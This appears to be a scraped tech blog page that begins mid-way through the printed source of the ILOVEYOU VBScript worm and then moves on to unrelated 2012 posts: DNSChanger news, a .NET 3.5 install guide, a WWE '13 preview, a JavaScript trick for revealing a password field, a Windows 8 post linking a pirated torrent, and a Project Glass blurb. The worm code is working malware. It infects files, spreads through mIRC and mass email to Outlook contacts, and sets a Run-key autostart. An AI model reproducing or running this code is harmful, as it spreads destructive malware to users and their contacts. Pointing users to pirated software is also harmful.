mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead )
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@
CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@-@fixed@-@
BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

What are DNS Changer Viruses?

DNS (Domain Name System) is an Internet service that converts user-friendly domain names into the numerical Internet protocol (IP) addresses that computers use to talk to each other. For example, google.com is actually an IP address (173.194.38.164). DNS makes it easier for us to remember the site names. DNS servers convert the domain names into IP addresses.

Now the malware, changes the domain naming servers in your computer and uses a different malicious DNS server. This malicious DNS server, swaps IP's and takes the user to a fake site.


Now if you log in to any of your accounts in the fake site, then your log in information is compromised. That's how the malware steals Credit Card details from the user.

FBI Process to stop DNS Changer : 

The Federal Bureau of Investigation (FBI) is on the final stage of its Operation Ghost Click, which strikes against the menace of the DNSChanger virus and trojan. Infected PCs running the DNSChanger malware at unawares are in the danger of going offline on this coming Monday (July 9) when the FBI plans to pull down the online servers that communicate with the virus on host computers.

After gaining access to a host PC, the DNSChanger virus tries to modify the DNS (Domain Name Server) settings, which are essential for Internet access, to send traffic to malicious servers. These poisoned web addresses in turn point traffic generated through infected PCs to fake or unsafe websites, most of them running online scams. There are also reports that the DNSChanger virus also acts as a trojan, allowing perpetrators of the hack attack to gain access to infected PCs.

Google issued a general advisory for netizens in May earlier this year to detect and remove DNSChanger from infected PCs. According to our report, some 5 lakh PCs were still infected by the DNSChanger virus in May 2012.

The first report of the DNSChanger virus and its affiliation with an international group of hackers first came to light towards the end of last year, and the FBI has been chasing them down ever since. The group behind the DNSChanger virus is estimated to have infected close to 4 million PCs around the world in 2011, until the FBI shut them down in November.

In the last stage of Operation Ghost Click, the FBI plans to pull the plug and bring down the temporary rogue DNS servers on Monday, July 9, according to an official announcement. As a result, PCs still infected by the DNSChanger virus will be unable to access the Internet.

Installing .net Framework 3.5 on Windows 8

The .NET Framework 4.5 is included with Windows 8 and installed on your computer with the operating system. However, the .NET Framework 3.5 is not automatically installed with Windows 8. To run applications that require the .NET Framework 3.5 on Windows 8, you must enable version 3.5 on your computer. There are two ways you can do this: by installing or running an application that requires the .NET Framework 3.5 (that is, by installing the .NET Framework 3.5 on demand), or by enabling the .NET Framework 3.5 in Control Panel. Both options require an Internet connection.

If an application requires the .NET Framework 3.5, but doesn't find that version enabled on your computer, it displays the following message box, either during installation, or when you run the application for the first time. In the message box, choose Install this feature to enable the .NET Framework 3.5. This option requires an Internet connection.



Prompt for installing the .NET Framework 3.5 on demand

You can also enable the .NET Framework 3.5 yourself through Control Panel. In Control Panel, choose Programs and Features, choose Turn Windows features on or off, and then select the Microsoft .NET Framework 3.5.1 check box. This option requires an Internet connection.



Turning Windows features on or off in Control Panel



If installing the .NET Framework 3.5 on demand or enabling it in Control Panel fails, you may get one of the following error messages:

0x800f0906: “Windows couldn't connect to the Internet to download necessary files. Make sure that you're connected to the Internet, and click Retry to try again.”

0x800F081F: “The changes could not be completed. Please reboot your computer and try again.”


These messages may be displayed for the following reasons:

Your computer is not connected to the Internet. Please connect, and then retry the operation.

If you cannot connect to the Internet, you can enable the .NET Framework 3.5 by using the Deployment Image Servicing and Management (DISM) command-line tool and specifying the installation media (ISO image or DVD) you installed Windows 8 from.

In Windows 8 or Windows Server 2012, open a Command Prompt window with administrative credentials (that is, choose Run as administrator).


To install the .NET Framework 3.5 from installation media located in the D:\sources\sxs directory, use the following command:

DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:d:\sources\sxs

Use /All to enable all parent features of the .NET Framework 3.5.


Use /LimitAccess to prevent DISM from contacting Windows Update.


Use /Source to specify the location of the files needed to restore the feature.

For more information about DISM parameters and options, see How to Enable or Disable Windows Features


You are using a local source, but the network location is inaccessible or doesn’t have the right content. Install the .NET Framework 3.5 from installation media as described in the previous bullet point.


Your administrator has configured your computer to use Windows Server Update Services (WSUS) instead of Windows Update for servicing. Ask your administrator to enable the policy to use Windows Update instead of WSUS.

If these instructions do not correct the problem, download the paper Microsoft .NET Framework 3.5 Deployment Considerations from the Windows Dev Center for more extensive troubleshooting information.

Saturday 29 September 2012

WWE '13


WWE '13 is an upcoming professional wrestling video game being developed by Yuke's and published by THQ for the PlayStation 3, Wii, Xbox 360. It will be the second game in the WWE series and the fifteenth overall in the combined series. It is the sequel to WWE '12, and will be released on October 30, 2012 in North America and November 2, 2012 in United Kingdom.

WWE '13 Poster

The game focuses on the Attitude Era of the WWF, replacing its Road to WrestleMania Mode with an Attitude Era Mode where the player plays through the Attitude Era. The game gives such characters as Stone Cold Steve Austin and elements as the Monday Night Wars a more important role in the game than in any previous WWE game.

Gameplay
WWE '13 will run on the engine called, "Predator Technology 2.0," which succeeds the first version from WWE '12. The Predator Technology 2.0 game engine has been updated from the previous WWE games to allow for more fluid animations, with odd collisions and transitions having been fixed and updated, it also allows for over 300 new moves. Past problems have been fixed with a better weight detection system, contextual animations and automatic attack homing, to ensure that the character always strikes towards the enemy. The contextual animation system has been refined to ensure that it dynamically swaps out moves to make sure that the game is using the appropriate move animations at any given time and state. The weight detection system makes it so that small superstars such as Rey Mysterio are unable to lift larger wrestlers such as the Big Show. Thus, the contextual animations ensure that more appropriate attacks are put in the superstar's normal moveset. The game's new homing system is designed that when doing high flying moves, a player will hit the intended target with better precision. The homing system also tracks tables so that they will be better detected when doing grapples on a ladder in TLC and Ladder matches.

Watch Trailer

Information

Developer(s) Yuke's
Publisher(s) THQ

Series WWE

Platform(s) PlayStation 3, Xbox 360, Wii

Release date(s) NA October 30, 2012
AU November 1, 2012
UK November 2, 2012

Wednesday 26 September 2012

Show Passwords behind *******

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?
Is it is possible to reveal by using only simple Javascript ..?
The Answer is YES it is possible just copy this few lines into your browser & Hit Enter then the password will show ..!!






Follow this simple procedure to get passwords that you have entered.

1. Open the Login Page of any website. (eg. http://mail.yahoo.com)

2. Type your 'Username' and 'Password'.

3. Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4. As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

Windows 8 Professional(+8.1 Download Link)

Windows 8 is an operating system produced by Microsoft for use on personal computers, including home and business desktops, laptops, tablets, and home theater PCs.

Windows 8 Start Screen


On August 1, 2012, Windows 8 (build 9200) was released to manufacturing. Microsoft plans to hold a launch event on October 25, 2012 and release Windows 8 for general availability on the next day. However, only a day after its release to manufacturing, a copy of the final version of Windows 8 Enterprise N (produced for European markets) leaked to the web and several days later there were Pro and Enterprise leaks both x86 and x64. On August 15, 2012, Windows 8 was made available to download for MSDN and TechNet subscribers. Windows 8 was made available to Software Assurance customers on August 16, 2012. Windows 8 was made available for student downloads (with a DreamSpark Premium subscription) on August 22, 2012, earlier than advertised.
Relatively few changes were made from the Release Preview to the final version: New backgrounds for desktop, lock screen and start screen, as well as a tutorial are added. Windows Explorer is now called File Explorer. Finally, the start screen and included apps are slightly tweaked.

Download Windows 8.1 Pro here via torrent

Wednesday 12 September 2012

Project Glass

Project Glass is a research and development program by Google to develop an augmented reality head-mounted display (HMD). The intended purpose of Project Glass products would be the hands-free displaying of information currently available to most smartphone users, and allowing for interaction with the Internet via natural language voice commands.

Google's Glass Screenshot


The functionality and physical appearance (minimalist design of the aluminium strip with 2 nose pads) has been compared to Steve Mann's EyeTap, which was also referred to as "Glass" ("EyeTap Digital Eye Glass", i.e. use of the word "Glass" in singular rather than plural form "Glasses").
The operating system software used in the glass will be Google's Android.

for more info goto www.infogallery.webs.com